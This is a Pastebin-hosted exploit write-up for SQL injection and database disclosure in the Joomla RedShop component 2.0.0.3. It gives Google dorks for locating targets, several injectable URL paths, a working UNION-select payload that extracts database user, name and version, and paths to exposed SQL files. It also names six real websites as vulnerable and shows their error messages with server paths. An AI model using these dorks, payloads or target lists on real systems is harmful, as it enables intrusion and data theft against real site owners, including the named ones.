Advertisement
KingSkrupellos

Joomla RedShop Components 2.0.0.3 SQL Inj - DB Disclosure

Feb 3rd, 2019
179
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.26 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla RedShop Components 2.0.0.3 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/02/2019
  7. # Vendor Homepage : redcomponent.com
  8. # Software Download Link : redcomponent.com/redcomponent/redshop
  9. # Software Information Link : extensions.joomla.org/extension/redshop/
  10. # Software Version : 2.0.0.3
  11. # Software Price : 49$
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/index.php?option=com_redshop''
  16. inurl:''/index.php?tmpl=component&option=com_redshop''
  17. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  18. Special Elements used in an SQL Command ('SQL Injection') ]
  19. # Old Similar CVE [ Only Version is Different 1.0 ] : CVE-2010-2694
  20. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  21. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  22. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  23.  
  24. ####################################################################
  25.  
  26. # Description about Software :
  27. ***************************
  28. RedShop is the leading webshop solution and Full Circle Ecommerce for Joomla!
  29.  
  30. ####################################################################
  31.  
  32. # Impact :
  33. ***********
  34. * SQL injection vulnerability in the redSHOP Component (com_redshop) 1.0 for Joomla!
  35.  
  36. allows remote attackers to execute arbitrary SQL commands
  37.  
  38. via different id and start parameters to index.php.
  39.  
  40. Joomla RedShop 2.0.0.3 component for Joomla and other versions
  41.  
  42. is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
  43.  
  44. user-supplied data before using it in an SQL query.
  45.  
  46. Exploiting this issue could allow an attacker to compromise the application,
  47.  
  48. access or modify data, or exploit latent vulnerabilities in the underlying database.
  49.  
  50. A remote attacker can send a specially crafted request to the vulnerable application
  51.  
  52. and execute arbitrary SQL commands in application`s database.
  53.  
  54. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  55.  
  56. An attacker can exploit this issue using a browser.
  57.  
  58. * This Software prone to an information exposure/database disclosure vulnerability.
  59.  
  60. Successful exploits of this issue may allow an attacker to obtain sensitive
  61.  
  62. information by downloading the full contents of the application's database.
  63.  
  64. * Any remote user may download the database files and gain access
  65.  
  66. to sensitive information including unencrypted authentication credentials.
  67.  
  68. ####################################################################
  69.  
  70. # SQL Injection Exploit :
  71. **********************
  72.  
  73. /index.php?option=com_redshop&view=product&pid=[SQL Injection]
  74.  
  75. /index.php?option=com_redshop&view=product&pid=[ID-NUMBER]&Itemid=[SQL Injection]
  76.  
  77. /index.php?option=com_redshop&view=product&pid=[ID-NUMBER]&Itemid=[ID-NUMBER]&from=inici&lang=[SQL Injection]
  78.  
  79. /index.php?option=com_redshop&view=ask_question&pid=[ID-NUMBER]&tmpl=component&Itemid=[SQL Injection]
  80.  
  81. /index.php?option=com_redshop&view=category&cid=[ID-NUMBER]&layout=detail&Itemid=[SQL Injection]
  82.  
  83. /index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=[SQL Injection]
  84.  
  85. /index.php?option=com_redshop&view=category&cid=[ID-NUMBER]&Itemid=[ID-NUMBER]&layout=default&limit=[ID-NUMBER]&limitstart=[SQL Injection]
  86.  
  87. /index.php?option=com_redshop&view=manufacturers&layout=products&mid=[ID-NUMBER]&print=[ID-NUMBER]&tmpl=component&Itemid=[SQL Injection]
  88.  
  89. /index.php?option=com_redshop&view=search&layout=default&category_id=[ID-NUMBER]&manufacture_id=[ID-NUMBER]&order_by=p.product_name&limitstart=[SQL Injection]
  90.  
  91. # Example SQL Injection Exploit Payload :
  92. ************************************
  93.  
  94. 24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,
  95. %20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,
  96. 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45
  97. ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=
  98. add&cid=20&sid=0.6886686905513422
  99.  
  100. # Database Disclosure Exploit :
  101. ***************************
  102.  
  103. /administrator/components/com_redshop/install.mysql.utf8.sql
  104. /administrator/components/com_redshop/uninstall.mysql.utf8.sql
  105.  
  106. ####################################################################
  107.  
  108. # Example Vulnerable Sites :
  109. *************************
  110.  
  111. [+] editorialgavarres.cat/index.php?option=com_redshop&
  112. view=product&pid=118&Itemid=9&from=inici&lang=1%27
  113.  
  114. [+] aleph-institute.org/index.php?option=com_redshop&view=
  115. category&cid=3&Itemid=0&layout=default&limit=1&limitstart=1%27
  116.  
  117. [+] antcliffschasewines.com/index.php?option=com_redshop
  118. &view=product&pid=22&Itemid=54
  119.  
  120. [+] algorythym.com/index.php?option=com_redshop&view=
  121. manufacturers&layout=products&mid=6&print=1&tmpl=component&Itemid=1'
  122.  
  123. [+] andersen.cl/index.php?option=com_redshop&view=
  124. category&cid=21&layout=detail&Itemid=18
  125.  
  126. [+] omzm.ru/index.php?option=com_redshop&view=search&layout=d
  127. efault&category_id=0&manufacture_id=0&order_by=p.product_name&limitstart=66
  128.  
  129. ####################################################################
  130.  
  131. # Example SQL Database Error :
  132. ****************************
  133.  
  134. No valid database connection You have an error in your SQL syntax; check the
  135. manual that corresponds to your MySQL server version for the right syntax
  136. to use near ''118''' at line 1 SQL=SELECT * FROM jos_redshop_pageviewer
  137. WHERE session_id = 'hopkirvvfd1ku6ek2l2isscs67'
  138. AND section='product' AND section_id='118''
  139.  
  140. Warning: Parameter 2 to showMorfeo() expected to be a reference, value
  141. given in /home/alephins/public_html/libraries/joomla/event/dispatcher.php on line 136
  142.  
  143. Deprecated: preg_replace(): The /e modifier is deprecated, use
  144. preg_replace_callback instead in /home/antcliff/public_html
  145. /libraries/joomla/filter/input.php on line 652
  146.  
  147. Strict Standards: Only variables should be assigned by
  148. reference in /home/antcliff/public_html/components
  149. /com_redshop/helpers/user.php on line 39
  150.  
  151. ####################################################################
  152.  
  153. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  154.  
  155. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement